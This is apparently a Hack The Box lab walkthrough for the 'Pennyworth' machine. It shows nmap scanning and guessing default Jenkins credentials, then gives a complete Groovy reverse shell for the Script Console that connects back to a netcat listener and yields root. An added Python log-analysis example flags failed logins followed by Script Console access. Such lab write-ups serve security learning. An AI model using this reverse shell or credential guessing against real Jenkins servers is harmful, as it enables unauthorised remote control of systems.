Pennyworth (VIP only)


Enumeration


As usual, let's start with nmap:

nmap -sV -sC IP

Replace IP with the IP of your target machine (Pennyworth).


The IP of the target machine changes from one session to the next, so make sure you type the correct one. You can find it on your Hack The Box account.

Port 8080 (HTTP) is open. From our VM, let's open our browser and type the following in the URL bar:

10.129.233.213:8080

It is important to add :8080 after the IP address. If you only enter the IP, your browser will try the default port 80. In this instance, it is port 8080 that is open.

We find this login page:


We do not have any credentials, so let's try some common Jenkins credentials and see if any of them work.

admin:password
admin:admin
root:root
root:password
admin:admin1
admin:password1
root:password1

After several attempts, we find that the username root with the password password lets us in!



Foothold


After looking around the website for a while, we find an interesting section of the site: the Script Console.

To get there, click on Manage Jenkins in the left pane, scroll all the way to the bottom of the page and click on Script Console.


Googling "exploit Jenkins" leads to this repository: https://github.com/gquere/pwn_jenkins

Scroll down to the reverse shell written in Groovy code:


String host="myip";
int port=1234;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// relay the shell's output to the socket and the socket's input to the shell
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();

We use a reverse shell to obtain an interactive shell session directly on the target. "Reverse" means that it is the target that initiates the connection back to us (the attacker), rather than us connecting to it.

Copy and paste the code above into the Script Console section of the website. It should look something like this:




Replace myip with the IP of your VM (the IP of the attacker's machine).


Note that the script uses port=1234, so when we use netcat later to listen, we also need to listen on port 1234.


If you don't know what your IP is, open a new terminal and type ifconfig tun0

Before running the script, open a new terminal, type the following netcat command and press Enter:

nc -lvnp 1234

-l: listen mode

-n: numeric-only IP addresses, no DNS resolution

-v: verbose

-p: port. We add p to say that we want to listen on a specific port (here 1234).


We use the netcat (nc) command to start listening on our port 1234, and then we simply wait for the target to connect back to us. From there we have an interactive shell and can control the target.

Now go back to the script and click on Run at the bottom right of your screen:


Now return to your netcat, and you should see it received a connection request from the target!
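From the defender's side, the two steps above (guessing default credentials, then using the Script Console) leave a recognisable trace in web logs. The following Python script is an added example, not part of the original post: it parses constructed access-log lines in the combined format that a reverse proxy in front of Jenkins might write, counts failed logins per source (Jenkins sends a failed login to /loginError), and flags any later request to the Script Console endpoints /script or /scriptText from the same source. The sample lines, the 10-minute window and the threshold of 3 failures are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in combined-log style, as a reverse proxy in front of
# Jenkins might write them: three bad passwords, one success, then /script.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:00:01 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [12/Mar/2024:10:00:01 +0000] "GET /loginError HTTP/1.1" 200 1450
10.10.14.5 - - [12/Mar/2024:10:00:04 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [12/Mar/2024:10:00:04 +0000] "GET /loginError HTTP/1.1" 200 1450
10.10.14.5 - - [12/Mar/2024:10:00:07 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [12/Mar/2024:10:00:07 +0000] "GET /loginError HTTP/1.1" 200 1450
10.10.14.5 - - [12/Mar/2024:10:00:10 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0
10.10.14.5 - - [12/Mar/2024:10:00:15 +0000] "GET /manage HTTP/1.1" 200 9021
10.10.14.5 - - [12/Mar/2024:10:00:20 +0000] "POST /script HTTP/1.1" 200 8123
10.0.0.7 - - [12/Mar/2024:10:05:00 +0000] "GET /script HTTP/1.1" 200 8123
"""

LOGIN_FAIL_PATH = "/loginError"             # Jenkins redirects here after a bad password
CONSOLE_PATHS = ("/script", "/scriptText")  # Script Console page and its text endpoint
FAIL_THRESHOLD = 3                          # assumption: tune for your environment
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse(line):
    """Return ip, ts (aware datetime), method, path, status as a dict; None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0].rstrip("/") or "/"  # drop query, trailing slash
    return rec

def analyse(log_text, window=timedelta(minutes=10)):
    """Flag Script Console requests; 'high' when FAIL_THRESHOLD+ failed logins precede them."""
    fails = defaultdict(list)  # source ip -> timestamps of failed logins
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["path"] == LOGIN_FAIL_PATH:
            fails[rec["ip"]].append(rec["ts"])
        elif rec["path"] in CONSOLE_PATHS:
            recent = [t for t in fails[rec["ip"]] if rec["ts"] - t <= window]
            severity = "high" if len(recent) >= FAIL_THRESHOLD else "medium"
            alerts.append((rec["ip"], rec["path"], len(recent), severity))
    return alerts
```

Every Script Console hit is reported because that page lets an administrator run arbitrary Groovy on the controller; the preceding burst of /loginError hits is what raises the first alert to high.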



From this newly created shell, type id or whoami to find out what privileges you have. We are root! Great!

id

whoami

Type ls to list all the files in the current directory:

ls

We find an interesting folder called root. Type cd root to go into the root directory.

cd root

Type ls again to list all the files in the root directory:

ls

Let's open the file flag.txt using the cat command:

cat flag.txt

Congratulations! You got the flag!
